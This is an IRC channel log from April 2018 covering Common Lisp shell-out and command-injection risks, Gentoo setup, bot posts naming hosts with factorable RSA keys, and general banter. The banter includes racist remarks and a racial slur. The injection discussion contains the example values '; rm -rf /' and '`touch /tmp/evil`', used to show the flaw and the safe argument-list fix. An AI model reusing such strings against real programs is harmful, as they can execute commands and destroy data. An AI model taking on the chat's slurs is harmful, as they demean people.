1805876;1524802318;mircea_popescu;mod6, ahaha. they're territorianal! 1805877;1524802329;mod6;oh boy, i found out indeed. 1805878;1524802345;mod6;had me jumping over a fence and running, stripping off all my clothes. 1805879;1524802361;trinque;ahaha that is a picture. 1805880;1524802371;mod6;lol, it sucked. 1805881;1524802385;mod6;after getting hosed down, went back to work. 1805882;1524802473;mod6;i dont have pics, which i totally regret not taking, but this past february I found a giant (think, basketball size) paperwasp nest in one of my huge Silver Maple trees. Had it cut down. That thing looked like it was gonna have a mega-count of the bastards. 1805883;1524802548;mod6;Thing landed in the snow, and I quickly used a hockey stick to shove it into a contractor bag. Nothing flew out -- but they say that the larve somehow survive the cold up here. 1805884;1524802564;mod6;*whew* 1805885;1524802605;mircea_popescu;i once took one apart in straight alcohol 1805886;1524802609;mircea_popescu;maybe golfball sized tho 1805887;1524802609;hanbot;http://trilema.com/2011/viesparium/ << obligatory. hymenoptera sux 1805888;1524802616;mircea_popescu;ya that's the one 1805889;1524802620;mircea_popescu;these are harmless guys tho. 1805890;1524802624;*;mod6 looks 1805891;1524802631;hanbot;lol "harmless" 1805892;1524802720;mod6;wow, this is quite the accounting of these beasts 1805893;1524815402;deedbot;http://phuctor.nosuchlabs.com/gpgkey/FCD084BE15CBB28BA33D5BA8453105B83669AD42641B17D409D4355ADF08B477 << Recent Phuctorings. - Phuctored: 1542...2319 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (wbm1upp01.magasin1.se. SE C) 1805894;1524817011;deedbot;http://phuctor.nosuchlabs.com/gpgkey/B3BFBA23F2BF795EEA507FAF666E87AC01A60B8EC765408B8439BE374479E235 << Recent Phuctorings. - Phuctored: 1795...8127 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown PL) 1805895;1524817578;deedbot;http://phuctor.nosuchlabs.com/gpgkey/01CCA0E67F766B697F22E540F70D19F00270DF95C858468CA531B641062FC23F << Recent Phuctorings. - Phuctored: 1795...8127 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown CN 31) 1805896;1524817578;deedbot;http://phuctor.nosuchlabs.com/gpgkey/B3BFBA23F2BF795EEA507FAF666E87AC01A60B8EC765408B8439BE374479E235 << Recent Phuctorings. - Phuctored: 1795...8127 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown PL) 1805897;1524832977;deedbot;http://thetarpit.org/posts/y04/071-cl-gpg.html << The Tar Pit - Interfacing Common Lisp programs with GPG the (nearly) painless way 1805898;1524833445;trinque;wtf. you're using format?! yet used uiop, but didn't bother to use their escape-shell-token ? 1805899;1524833964;spyked;the post doesn't purport to be a guide in correct common lisp programming (issues with those functions are explicitly discussed at the end). anyway, trinque, what's wrong with format? 1805900;1524833991;spyked;(other than the issues mentioned in the post) 1805901;1524834018;trinque;I dunno why anyone would write a blog post proposing "shell out" and then omit the proper handling of inputs as out of article scope 1805902;1524834511;spyked;only one reason: brevity. had I solved this, then I would also have to solve "GPG error codes" and all the other problems that GPGME solves. the point was to avoid this complexity altogether for what I'm doing. 1805903;1524835216;spyked;anyway, thanks for the escape-shell-token tip trinque, I'm looking into it and will update the post. 1805904;1524835419;trinque;http://btcbase.org/log/2016-09-15#1542346 << uiop hasn't the best reputation ftr 1805905;1524835419;a111;Logged on 2016-09-15 15:08 phf: i think asdf is evil, version 3 is doing some straight up systemd shit. for those who don't know asdf 3 comes with fare's own portability layer called uiop, which in a very systemd agressive and underhanded style is superseding existing utility libraries. 1805906;1524836045;spyked;good to know, I'll add an example using sbcl's run-program. iirc drakma (or one of the libraries it depends on) forced me to update to asdf3 because of uiop dependency, when getting cl-feed-parser to run. 1805907;1524836108;mod6;mornin' 1805908;1524836192;spyked;morning mod6 1805909;1524837082;mod6;how goes spyked? 1805910;1524837199;spyked;pretty good, learning new things about the common lisp environment. :) 1805911;1524837213;mod6;Right on, I'm just reading your post here. :] 1805912;1524839019;phf;http://btcbase.org/log/2018-04-27#1805906 << asdf3 is pretty much standard in all the lisps right now, you have to go out of the way to downgrade. at the very least avoid implicit uiop dependency and declare it in your asdf file (this is by the way even fare's recommendation, but people ignore it "oh i have asdf3, means i can just throw a sneak uiop:foo all over my code) 1805913;1524839019;a111;Logged on 2018-04-27 13:34 spyked: good to know, I'll add an example using sbcl's run-program. iirc drakma (or one of the libraries it depends on) forced me to update to asdf3 because of uiop dependency, when getting cl-feed-parser to run. 1805914;1524839136;phf;http://btcbase.org/log/2018-04-27#1805899 << format is _notorious_ way to get a shell command injection. we had one uncovered by douchebag just two weeks ago in one of the republic's automated processes 1805915;1524839136;a111;Logged on 2018-04-27 12:59 spyked: the post doesn't purport to be a guide in correct common lisp programming (issues with those functions are explicitly discussed at the end). anyway, trinque, what's wrong with format? 1805916;1524839215;spyked;I understand that, I even put an example of command injection in the post. I thought there was some other reason. 1805917;1524839216;phf;but you don't even have to jump through the hoops of escaping, most lisp's run program implementations, uiop including, support passing in command as a list of strings, which are in turn handled properly by the underlying machinery 1805918;1524839234;phf;tl;dr :> 1805919;1524839255;phf;alternative approach is e.g. (uiop/run-program:run-program (list "ls" "/")) 1805920;1524839280;spyked;anyway, I've learned a few useful things today and I'm adding them as (hopefully brief!) updates :D 1805921;1524839326;trinque;cool 1805922;1524839806;phf;spyked: what i'm saying is that you can avoid the injection without even introducing any new elements, http://p.bvulpes.com/pastes/gYkxc/ 1805923;1524839887;*;trinque first says "ohey p.bvulpes has lisp highlighting!" then "oh wait, lack of escaping as a feature" 1805924;1524839893;trinque;it's a good example and a bad example all in one 1805925;1524839902;phf;:D 1805926;1524840238;spyked;neat phf, I had no idea that was possible. I was going to add some assert/check-type calls anyway though. 1805927;1524840296;trinque;isn't "rm -rf /" the correct type? 1805928;1524840313;trinque;er, with a ; at the front 1805929;1524840337;spyked;:)) 1805930;1524841453;spyked;http://btcbase.org/log/2018-04-27#1805897 <-- updated. http://thetarpit.org/posts/y04/071-cl-gpg.html#selection-1035.0-1037.1 (crap this is even longer now; I need to be more succint) 1805931;1524841453;a111;Logged on 2018-04-27 12:42 deedbot: http://thetarpit.org/posts/y04/071-cl-gpg.html << The Tar Pit - Interfacing Common Lisp programs with GPG the (nearly) painless way 1805932;1524842614;lobbes;Neato spyked. I'm sure I'll be putting your guide to practical use once it comes time to implement the self-voicing bit of the eventual tickerbot I'm building 1805933;1524842778;lobbes;I've found myself squirreling away these paradropped ru-isms >> http://btcbase.org/log/2018-04-26#1805802 1805934;1524842778;a111;Logged on 2018-04-26 19:35 asciilifeform: the d00d throwing away his sores, is classical 'назло кондуктору: куплю билет пойду пешком!' analchild maculae 1805935;1524843012;mircea_popescu;lol 1805936;1524843374;mircea_popescu;http://btcbase.org/log/2018-04-27#1805903 << poor spyked keeps getting blindsided with this sorta item. how you holding up in there, yo 1805937;1524843374;a111;Logged on 2018-04-27 13:20 spyked: anyway, thanks for the escape-shell-token tip trinque, I'm looking into it and will update the post. 1805938;1524843542;mircea_popescu;http://btcbase.org/log/2018-04-27#1805906 <<< it's how you say drepper in lisp. 1805939;1524843542;a111;Logged on 2018-04-27 13:34 spyked: good to know, I'll add an example using sbcl's run-program. iirc drakma (or one of the libraries it depends on) forced me to update to asdf3 because of uiop dependency, when getting cl-feed-parser to run. 1805940;1524843591;asciilifeform;or, can also verb: drepping 1805941;1524843661;mircea_popescu;or can also eat shit and die. 1805942;1524843676;mircea_popescu;http://btcbase.org/log/2018-04-27#1805922 << if you're going to "--clearsign" why not "-aer uid" for the same money ? 1805943;1524843676;a111;Logged on 2018-04-27 14:36 phf: spyked: what i'm saying is that you can avoid the injection without even introducing any new elements, http://p.bvulpes.com/pastes/gYkxc/ 1805944;1524843686;asciilifeform;mircea_popescu: that -- punishment. drepping -- the crime. 1805945;1524843703;mircea_popescu;the crime and the punishment are indistinguishable in all divine systems. 1805946;1524843719;mircea_popescu;"in theory there is no difference..." 1805947;1524845834;BingoBoingo;http://www.thedrinkingrecord.com/2018/04/27/the-triump-of-will-yet-another-infinity-war-review/ << All the spoilers necessary for Trolling this weekend 1805948;1524845844;deedbot;http://www.thedrinkingrecord.com/2018/04/27/the-triump-of-will-yet-another-infinity-war-review/ << Bingo Blog - The Triump Of Will: Yet Another Infinity War Review 1805949;1524845855;asciilifeform;triumph? 1805950;1524845880;BingoBoingo;asciilifeform: Definitely. The right fellow wins. 1805951;1524845894;BingoBoingo;Of course pantsuit will retcon it with a sequel 1805952;1524845907;BingoBoingo;But Provided this is taken as the end of the story, it is the right ending 1805953;1524845979;mircea_popescu;you spelled it without an h 1805954;1524845998;BingoBoingo;Ah 1805955;1524846046;BingoBoingo;I'm used to seeing It spelled in my head as Trump, thusly fixed 1805956;1524846089;BingoBoingo;A man on a gruelling mission acquires one McGuffin which will allow him to finally rest, and begins a race against time as the forces of socialism and fake humanitarian scammers align against him. 1805957;1524846090;jurov;http://btcbase.org/log/2018-04-27#1805901 In 99 cases out of 100 shell is not needed and honest-to-God execve() is sufficient 1805958;1524846090;a111;Logged on 2018-04-27 13:00 trinque: I dunno why anyone would write a blog post proposing "shell out" and then omit the proper handling of inputs as out of article scope 1805959;1524846190;jurov;no idea why common lisp is so obtuse about it 1805960;1524846233;asciilifeform;jurov: i can't resist to ask -- how's that, and vs what 1805961;1524846293;trinque;jurov: can't blame the forklift when it runs over the operator 1805962;1524846633;jurov;i mean, execve does not mutilate any parameters passed to it 1805963;1524846698;jurov;because it does not execute shell but the command directly 1805964;1524847106;mircea_popescu;i dont' get it, lisp shellout to execve ? 1805965;1524848791;jurov;lisp calls shell with command and parameters. Shell then splits the parameters (and expands variables and many other things uncalled for) and pass them to execve syscall anyway. 1805966;1524850119;mircea_popescu;so basically use it like a wrapper 1805967;1524850236;*;mircea_popescu thought both exec and execve are ~same, except one passes a list. 1805968;1524850721;lobbes;I thought he meant to cut out the shell middleman entirely and just directly call execve()? 1805969;1524851112;deedbot;http://phuctor.nosuchlabs.com/gpgkey/741F83D180F194CFCEBD19BAD698A5DCAE9DFFB03F14A1687DC41D44706846DD << Recent Phuctorings. - Phuctored: 1598...9993 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (mail.10gb-host.net. TH) 1805970;1524851373;trinque;jurov: lobbes: https://github.com/sbcl/sbcl/blob/master/src/code/run-program.lisp#L610 << apologies for shithub, but it does use execve on at least sbcl. 1805971;1524851405;trinque;even if some other wrapper is using only shellout, has to be firing up that shell *somehow*, right? 1805972;1524851451;jurov;trinque: i dun parse 1805973;1524851473;trinque;meh. 1805974;1524851519;jurov;No, you don't need shell to execute other programs. 1805975;1524851536;trinque;that is not what I said, at all. 1805976;1524851687;jurov;so what did you say? 1805977;1524851728;trinque;jurov: http://p.bvulpes.com/pastes/Xd9fA/?raw=true 1805978;1524851974;jurov;trinque (run-program "ls" '() :SEARCH T) 1805979;1524852022;mircea_popescu;lobbes, they're all the middleman 1805980;1524852078;jurov;for example, if sbcl ran the command using shell, this would have side effect of actually running touch: (run-program "ls" '("`touch /tmp/evil`") :SEARCH T) 1805981;1524852131;asciilifeform;why puzzle, see output of strace 1805982;1524852140;asciilifeform;( spoiler : jurov is right ) 1805983;1524852151;trinque;huh. that's pretty sad then. 1805984;1524852156;asciilifeform;( at least re my copy of sbcl ) 1805985;1524852257;*;mircea_popescu is pretty impressed, had nfi. 1805986;1524852343;trinque;I don't see an extra shell in there, unless they hand-off via "exec" 1805987;1524852389;mircea_popescu;there's no exec per se is there ? 1805988;1524852613;trinque;(run-program "/bin/dd" '("if=/dev/zero")) << I see nothing but sbcl with dd for child 1805989;1524852632;trinque;mircea_popescu: I mean the shell command, only way I can conceive ^ happening if it is indeed using the shell 1805990;1524852715;trinque;jurov: looks to me like that :search parameter is indeed evil, DWIMs and runs in shell 1805991;1524852812;asciilifeform;trinque: that's consistent with execv call 1805992;1524852850;asciilifeform;( possibly at issue here is abuse of terminology -- folx call this 'shelling out' but e.g. /bin/sh does not run ) 1805993;1524852973;asciilifeform;^ re the dd example, if it wasn't clear 1805994;1524853047;trinque;whether the thing has a "bite your dick off" switch, or bites your dick off by default, either way discussing degree of idiocy, I fully agree. 1805995;1524853110;asciilifeform;in unix world it is the buttons that ~don't~ biteyerdickoff , that are remarkable. 1805996;1524853465;deedbot;http://qntra.net/2018/04/kanye-makes-pantsuit-media-headlines-while-outlets-refuse-to-acknowledge-growing-hotep-movement/ << Qntra - Kanye Makes Pantsuit Media Headlines While Outlets Refuse To Acknowledge Growing Hotep Movement 1805997;1524853566;BingoBoingo;^ trump's second term is coming along nicely if his bodily integrity holds up 1805998;1524853638;mircea_popescu;https://www.youtube.com/watch?v=iw5bYlTs9Wk in other lulz, pantsuit handpuppet attempts cultural appropriotion 1805999;1524853770;BingoBoingo;They were promised laser spears and flying rocket Pyramids. USG.Disney fucked up not aligning Wakanda with our hero Thanos. 1806000;1524853799;mircea_popescu;it's pretty lulzy how threatened they are. 1806001;1524853840;mircea_popescu;apparently the 1970s "black men know how to organize la revolucion innately, instinctively, and only" nonsense that impelled inepty prisses a la hillary rodham to her ultimate impalement on a stake of lulz are still with them! 1806002;1524853852;mircea_popescu;they actually believe black men are somehow demographically relevant, god bless their souls. 1806003;1524853876;BingoBoingo;#woke >> "Black Lives Matter wishes to appeal to the moral nature of a people that have shown no signs of having a moral compass. Hoteps believe this is assinine. Black Lives Matter would rather complain about the damage the “white man” has done to their communities instead of fixing the issues themselves. BLM wishes to protest and Hoteps do not. BLM will not acknowledge the black on black crime in the community while Hoteps do. 1806004;1524853876;BingoBoingo;BLM does not believe that black economics will cure many of the black communities problems and Hoteps have reason to believe otherwise." 1806005;1524853951;BingoBoingo;Well, In USSA they are good for enough of a swing to make more than enough laffs 1806006;1524853985;mircea_popescu;why not pick the mexicans to be your salvation, at least the shorties like to work. 1806007;1524853999;mircea_popescu;and there's just as irrelevantly but slightly more of them. 1806008;1524854057;BingoBoingo;The Mexicans like to work, inevitably turn great again. That's why Pantsuit is trying to lure the ones who didn't come to work in 1960-2004 in now. 1806009;1524854121;mircea_popescu;i suppose the nonsense does have some batshit internal logic. 1806010;1524854161;BingoBoingo;It has a rough skeleton. Like a big tent. Liek their own metaphor. 1806011;1524854176;mircea_popescu;i guess so huh. 1806012;1524854300;*;BingoBoingo will confess to seeing the first English language (spanish subtitles) showing of what the authors call "Avengers: Infinity War" Eating one of the local "magic" baked goods T-1 hour before showing, and spending most of the time Thanos wasn't gloating over a WOT filter for this balancing 1806013;1524854394;BingoBoingo;* wondering why Thanos wasn't gloating 1806014;1524854620;BingoBoingo;The theater was filled with young Uruguayos who *clapped* when their favorites appeared on screen. (I have since been told clapping because things happen in movies is normal here) Thusly I clapped when their favorites died at the hands of my favorite. 1806015;1524854728;BingoBoingo;And yes, the quality of CGI has fallen dramatically over the past 10 years. A good chunk of the film was dominated by video game characters pasted onto a map made out of what the real cameras captured. 1806016;1524854754;mircea_popescu;heh 1806017;1524854789;mircea_popescu;i've yet to see one of those cgi wonders. but it's pretty obvious when they switch, like say in grande belezza, when those flamingos show up, the sky is supposed to bhe like whatever, sky-of-rapture i guess 1806018;1524854794;mircea_popescu;but it totally looks like sky-of-bits 1806019;1524854824;BingoBoingo;Complete with clothing that moved like... video game shit. Clothes moving in unison with the silhouette instead of like cloth. 1806020;1524854916;ben_vulpes;BingoBoingo: advance guard for replacing even the mocaptors with https://www.technologyreview.com/s/610773/virtual-robots-that-teach-themselves-kung-fu-could-revolutionize-video-games/ 1806021;1524854923;BingoBoingo;The rotoscope detail on the faces, but.. when asked how much of the clothed torso should animators have to track the execs answered "none" 1806022;1524855059;BingoBoingo;ben_vulpes: this is a pronounced backslide compared to the CGI in 2003's Hulk movie 1806023;1524855077;ben_vulpes;spreading! 1806024;1524855084;BingoBoingo;Or 2011's Planet of the Apes movie 1806025;1524855148;mircea_popescu;this "could revolutionize" is by now how jews say "bullshit not worth reading". it's a sort of rel=nofollow for zeks. 1806026;1524855224;BingoBoingo; but it totally looks like sky-of-bits << The great lulz in is how much effort they put into te skys, faces, and armor yet revert to common failure modes on... Shirts! 1806027;1524857691;deedbot;http://phuctor.nosuchlabs.com/gpgkey/F1ED5F9D4B2AF299C23329206CB58D4C01D46AB6B49CE687D609BE1E707B0745 << Recent Phuctorings. - Phuctored: 2974...8743 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown EG) 1806028;1524857691;deedbot;http://phuctor.nosuchlabs.com/gpgkey/4CA047A1DC3B4DD0A2254C9274AB5B4A4B5AECD404AE95EEEE0DE227113F35E1 << Recent Phuctorings. - Phuctored: 2974...8743 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (840.rt-barnaul-02.dianet.ru. RU) 1806029;1524857691;deedbot;http://phuctor.nosuchlabs.com/gpgkey/E17BC3E38DABD1C91A27D226FC57B2ACFEB88E913F4D218985717FDD514FB934 << Recent Phuctorings. - Phuctored: 2974...8743 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (static.vnpt.vn. VN 64) 1806030;1524857691;deedbot;http://phuctor.nosuchlabs.com/gpgkey/4D06D8481441CD5F5CE45274A5CED690CAED25EFB721DF8809C5178A3D26574C << Recent Phuctorings. - Phuctored: 2974...8743 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown RU MOW) 1806031;1524858507;BingoBoingo;In other lulz this week, a born and breed Uruguayo approached me this week asking advice on doing business with Norte Americanos this week. He was completely confounded that Gringos del Norte do not want to wait until after 3-4 skype "meetings" before making a decision. I explained I am in LATAM for reasons, but it would be to his advantage to streamline his shit so he is ready to sell it when the customer is ready to buy 1806032;1524858703;asciilifeform;BingoBoingo: what was he selling ? 1806033;1524858729;BingoBoingo;asciilifeform: He and an few other Uruguayos do website renovations 1806034;1524858741;asciilifeform;renovations?! they rust?!? 1806035;1524858752;BingoBoingo;Apparently 1806036;1524858769;BingoBoingo;Either that or the browsers rust 1806037;1524858932;BingoBoingo;He was not the fellow who earlier inquired on what sort of shared hosting prices I could offer that might sway him from the under 3 USD a month contract he entered into "Hostgator". That was a Redhat JVM developer. 1806038;1524858970;*;BingoBoingo is accepting his role as zoo animal, living amongst the others. 1806039;1524858974;asciilifeform;aa lol the usg provocateur d00d 1806040;1524858992;asciilifeform;( picture, why would rathead suddenly ask after pizarro ) 1806041;1524859074;BingoBoingo;asciilifeform: This was actually asked in February. Right before my logistics fail. And yes he has greasy rat hair. 1806042;1524859101;BingoBoingo;Balked when I did napkin math with him 1806043;1524859142;*;BingoBoingo suggested he buy a cheap-o refurb tower and then walked him through space power math. 1806044;1524859305;BingoBoingo;Also, the green birds from http://www.thedrinkingrecord.com/2018/04/25/remedial-skills-camera-walk-rtfm-edition/ La Peruana insists are Loros, but I am calling bullshit on her because Loros talk. 1806045;1524859331;BingoBoingo;After I put in some effort trying to teach them to say nigger 1806046;1524859342;deedbot;http://phuctor.nosuchlabs.com/gpgkey/C221D63144C2297870888E6712BF15F1E4A5E3C4403DCFCEEF46BFD1813141C9 << Recent Phuctorings. - Phuctored: 1427...9357 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (vps01.atlantem.net. FR) 1806047;1524859370;BingoBoingo;But if they are Loros that would explain why I occasionally hear "Todo bien" coming from los arboles 1806048;1524859669;asciilifeform;i didn't notice any 'proper' parrot in BingoBoingostan. only the little green argentine type. 1806049;1524859675;asciilifeform;afaik those dun talk.. 1806050;1524859689;asciilifeform;( or.. do they?? mircea_popescu knows ? ) 1806051;1524859709;BingoBoingo;Those are the little green ones. I am going to see. 1806052;1524859723;mircea_popescu;the green guys are parrots, why not ? 1806053;1524859748;BingoBoingo;Cool, then next week gotta teach them to meme 1806054;1524859779;mircea_popescu;it's not a natural functuionm, you realise, like fucking. gotta spend time to TEACH THEM. 1806055;1524859818;*;asciilifeform laboured under the notion that parrots in city oughta emit such sounds as motorcycle vroom, horns, etc 1806056;1524859830;mircea_popescu;even mockingbirds do that. 1806057;1524859862;BingoBoingo;These guys hang by the Puertito 1806058;1524860447;deedbot;http://phuctor.nosuchlabs.com/gpgkey/741F83D180F194CFCEBD19BAD698A5DCAE9DFFB03F14A1687DC41D44706846DD << Recent Phuctorings. - Phuctored: 1471...9097 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (mail.10gb-host.net. TH) 1806059;1524872537;douchebag;Have you guys seen the BGP hijack that allowed a bunch of peopels Ethereum to be stolen? 1806060;1524872790;mircea_popescu;o hey, how's the rockchip working for you douchebag ? 1806061;1524873437;douchebag;it's working - still getting used to Gentoo 1806062;1524873453;douchebag;Haven't really worked much with Gentoo so it's a bit of learning 1806063;1524873474;asciilifeform;oh hey 1806064;1524873528;mircea_popescu;cool. 1806065;1524873538;asciilifeform;douchebag: lemme know if you run into problems. also see my www, i posted a recipe for how to make the same box at home, to test on. 1806066;1524873553;mircea_popescu;but why would he lol. box is there to test on already. 1806067;1524873566;asciilifeform;mircea_popescu: the most obvious reason would be if he wants to make own linux for it. 1806068;1524873575;asciilifeform;( this goes for all potential subscribers. ) 1806069;1524873593;mircea_popescu;may be a while yet. 1806070;1524873834;douchebag;hey actually 1806071;1524873839;douchebag;asciilifeform: 1806072;1524873858;douchebag;The url of the encrypted file w/ credentials for the vps is missing 1806073;1524873870;asciilifeform;waiwat 1806074;1524873875;asciilifeform;we dun have a vps 1806075;1524873888;asciilifeform;and what file 1806076;1524873893;douchebag;http://p.bvulpes.com/pastes/Fgc0N/?raw=true 1806077;1524873911;asciilifeform;how am i to know what this was ? 1806078;1524873920;douchebag;Okay so ben vulpes sent me that link 1806079;1524873924;douchebag;and it gave me the ssh creds 1806080;1524873924;asciilifeform;!#s http://p.bvulpes.com/pastes/Fgc0N/?raw=true 1806081;1524873924;a111;2 results for "http://p.bvulpes.com/pastes/Fgc0N/?raw=true", http://btcbase.org/log-search?q=http%3A%2F%2Fp.bvulpes.com%2Fpastes%2FFgc0N%2F%3Fraw%3Dtrue 1806082;1524873960;asciilifeform;douchebag: this was presumably your rockchip login ? if as you said you are 'getting used to gentoo', you already have it ? 1806083;1524873974;asciilifeform;or you lost yer copy, or what 1806084;1524873978;douchebag;oooh nevermid 1806085;1524873986;douchebag;thanks to lobbes bot I found an archive of it 1806086;1524874010;*;asciilifeform is confused : douchebag only now thought to log in to the box for 1st time ?? 1806087;1524874035;douchebag;No 1806088;1524874046;douchebag;with all pgp stuff I decrypt 1806089;1524874049;douchebag;i save it as x.asc 1806090;1524874055;douchebag;and just copy in the new gpg msg 1806091;1524874070;douchebag;and I had overwritten it 1806092;1524874078;douchebag;and thought I lost the gpg message that contained my credentials 1806093;1524874093;douchebag;going to generate an rsa key for logging into it now 1806094;1524874220;asciilifeform;so what was the 'getting used to gentoo' about ? 1806095;1524874233;asciilifeform;got own gentoo box at home ? 1806096;1524874266;douchebag;I've always used Arch and I currently use MacOS as my primary OS 1806097;1524874432;asciilifeform;eh nm 1806098;1524874459;douchebag;What's your main OS? 1806099;1524874462;asciilifeform;gentoo. 1806100;1524874479;douchebag;What are some of the reasons you prefer using it? 1806101;1524874492;asciilifeform;!#s from:asciilifeform gentoo 1806102;1524874492;a111;301 results for "from:asciilifeform gentoo", http://btcbase.org/log-search?q=from%3Aasciilifeform%20gentoo 1806103;1524874497;asciilifeform;^ see log 1806104;1524874648;asciilifeform;https://archive.li/TzRKT << in noose lulz. ' “We don’t care, we think you’re a criminal, and I’m sorry but Microsoft wants your head on a platter and I’m going to give it to them.” Those are the words that the US attorney said to me in that meeting, face to face.' 1806105;1524874666;douchebag;lol 1806106;1524874718;douchebag;Yeah, I never really got much into Gentoo because it always takes so damn long to install everything from source 1806107;1524874755;asciilifeform;depends on how much your 'everything' weighs, neh 1806108;1524874776;asciilifeform;for instance, rebuilding world on the rockchip ( a quite modest comp ) takes about a day and a half 1806109;1524874788;asciilifeform;and this incl. ~all~ contents, incl compiler 1806110;1524874803;asciilifeform;how much 'everything' do you actually need. 1806111;1524875016;douchebag;well like for instance 1806112;1524875024;douchebag;I'm installing vim on the rockchip box right now 1806113;1524875028;douchebag;and it's been like 20 minutes 1806114;1524875039;asciilifeform;kill it. and read mod6's experience in #pizarro 1806115;1524875047;asciilifeform;you gotta ban xorg if yer a vim user 1806116;1524875050;asciilifeform;or it will try to build xorg 1806117;1524875058;asciilifeform;which you do NOT want on that box 1806118;1524875080;douchebag;https://i.imgur.com/zwRe5Ei.png 1806119;1524875088;asciilifeform;http://logs.bvulpes.com/pizarro?d=2018-4-22#342309 1806120;1524875088;mimisbrunnr;Logged on 2018-04-22 17:04 asciilifeform: you didn't ban xorg 1806121;1524875124;*;asciilifeform wonders why this required a screenshit 1806122;1524875137;mircea_popescu;this is going well i see... 1806123;1524875172;asciilifeform;douchebag: ls -ltr /var/log/portage and find the emerge log and you can see what it does. 1806124;1524875176;asciilifeform;( see the mod6 thread . ) 1806125;1524875370;asciilifeform;douchebag: historically i've found that setting up a gentoo box to 'workstation' standard takes 2-3 wks. (depending , though less than you might think, on the speed of the comp.) fortunately 99+% of the work has already been done for you on that box. 1806126;1524875504;mod6;Evenin' 1806127;1524875511;asciilifeform;heya mod6 1806128;1524875613;mod6;How goes today? 1806129;1524875688;asciilifeform;mod6: still recovering from whatever that was i picked up. 1806130;1524875713;mod6;Ugh! Hopefully you can get some extra rest this weekend then. 1806131;1524876093;mircea_popescu;http://btcbase.org/log/2018-04-28#1806104 << criminal org slowly shedding the pretense. 1806132;1524876093;a111;Logged on 2018-04-28 00:17 asciilifeform: https://archive.li/TzRKT << in noose lulz. ' “We don’t care, we think you’re a criminal, and I’m sorry but Microsoft wants your head on a platter and I’m going to give it to them.” Those are the words that the US attorney said to me in that meeting, face to face.' 1806133;1524876292;asciilifeform;been a while since i heard of anybody jailed for ~selling~ warez on physical disk tho. i was convinced these died with the '90s 1806134;1524876334;mircea_popescu;eh, they have this whole menagerie of "trutfully relevant and working sir!" patent medicines. 1806135;1524876344;mircea_popescu;"the sting operation". "the proof". the blabla 1806136;1524876385;asciilifeform;dun forget 'the signed confession' (not yet from him, supposedly, but there is always next day) 1806137;1524876436;mircea_popescu;righ right. "the plea bargain". 1806138;1524876450;asciilifeform;how'd it go, confessio est regina probationum (tm)(r) 1806139;1524876486;mircea_popescu;it's reached epileptic trees level of self-referential nonsense by now. 1806140;1524876487;asciilifeform;or prolly better known today in ru, from the mouth of vyshinsky, 'Признание - царица доказательств' 1806141;1524876527;mircea_popescu;and through it all, perhaps the most amusing part, their wholly spurious pretense that ~everyone~ gives a shit ; fly it in the face of plain and ubiquitous evidence that a single soul that does can not be found for love or money. 1806142;1524876592;mircea_popescu;fly it in the face of all evidence all it will ; in the mental patients' inner world, "law enforcement" is as much a thing as any other structured delusion. 1806143;1524876637;asciilifeform;this kinda thing happily carries on right until the moment the plank drops and the noose tightens, at nuremberg 1806144;1524876681;mircea_popescu;if history's any guide. 1806145;1524890220;deedbot;http://phuctor.nosuchlabs.com/gpgkey/DEDA27B0CE5CC15727B6B39368F31CDFC09264848CCF0871F98A1E511482D35C << Recent Phuctorings. - Phuctored: 1367...3291 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown BR) 1806146;1524890220;deedbot;http://phuctor.nosuchlabs.com/gpgkey/A15D93A29368C0ED998F14D5FB4ACD4324BF3F8683943FFA0E8A4105476CCC95 << Recent Phuctorings. - Phuctored: 1367...3291 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (177-38-182-218.micks.com.br. BR) 1806147;1524896779;deedbot;http://phuctor.nosuchlabs.com/gpgkey/C221D63144C2297870888E6712BF15F1E4A5E3C4403DCFCEEF46BFD1813141C9 << Recent Phuctorings. - Phuctored: 1539...5997 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (vps01.atlantem.net. FR) 1806148;1524908208;deedbot;http://phuctor.nosuchlabs.com/gpgkey/9CBA4D6A7716B783AA7DD1FEE8DCE6BC5D8666A0C4F3E34DF1CB9C0090894491 << Recent Phuctorings. - Phuctored: 1582...5993 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (nagios.plzenska.net. CZ) 1806149;1524909162;spyked;http://btcbase.org/log/2018-04-27#1805932 <-- coincidentally, I also want to use it to implement self-voicing. although tbh, in the long term I'd love to see the unix world 